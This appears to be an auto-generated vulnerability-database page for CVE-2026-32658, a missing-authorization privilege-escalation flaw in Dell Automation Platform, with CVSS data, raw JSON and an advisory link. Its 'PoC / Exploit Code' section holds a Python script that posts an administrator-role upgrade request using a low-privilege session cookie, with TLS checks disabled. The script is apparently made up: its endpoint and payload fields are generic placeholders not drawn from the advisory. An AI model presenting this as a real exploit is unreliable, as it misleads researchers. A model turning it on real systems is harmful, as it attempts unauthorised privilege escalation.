Security Vulnerability Report
中文
CVE-2026-32658 CVSS 8.0 HIGH

CVE-2026-32658

Published: 2026-05-11 10:16:13
Last Modified: 2026-05-11 10:16:13

Description

Dell Automation Platform versions prior to 2.0.0.0, contains a missing authorization vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Dell Automation Platform < 2.0.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-32658: Missing Authorization leading to Privilege Escalation # Target: Dell Automation Platform < 2.0.0.0 TARGET_URL = "https://<target-host>/api/v1/sensitive/endpoint" SESSION_COOKIE = "low_priv_user_session_token" def exploit_missing_auth(): headers = { "Cookie": f"session_id={SESSION_COOKIE}", "User-Agent": "Mozilla/5.0 (PoC-Scanner)", "Content-Type": "application/json" } # Payload attempting to perform an administrative action payload = { "action": "upgrade_privileges", "target_role": "administrator", "user_id": "current_low_priv_user" } try: print(f"[*] Sending request to {TARGET_URL}...") response = requests.post(TARGET_URL, json=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Request successful! The endpoint may be missing authorization checks.") print(f"[+] Response: {response.text}") else: print(f"[-] Request failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": exploit_missing_auth()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32658", "sourceIdentifier": "[email protected]", "published": "2026-05-11T10:16:13.370", "lastModified": "2026-05-11T10:16:13.370", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Automation Platform versions prior to 2.0.0.0, contains a missing authorization vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000458049/dsa-2026-193-security-update-for-dell-automation-platform-multiple-vulnerabilities", "source": "[email protected]"}]}}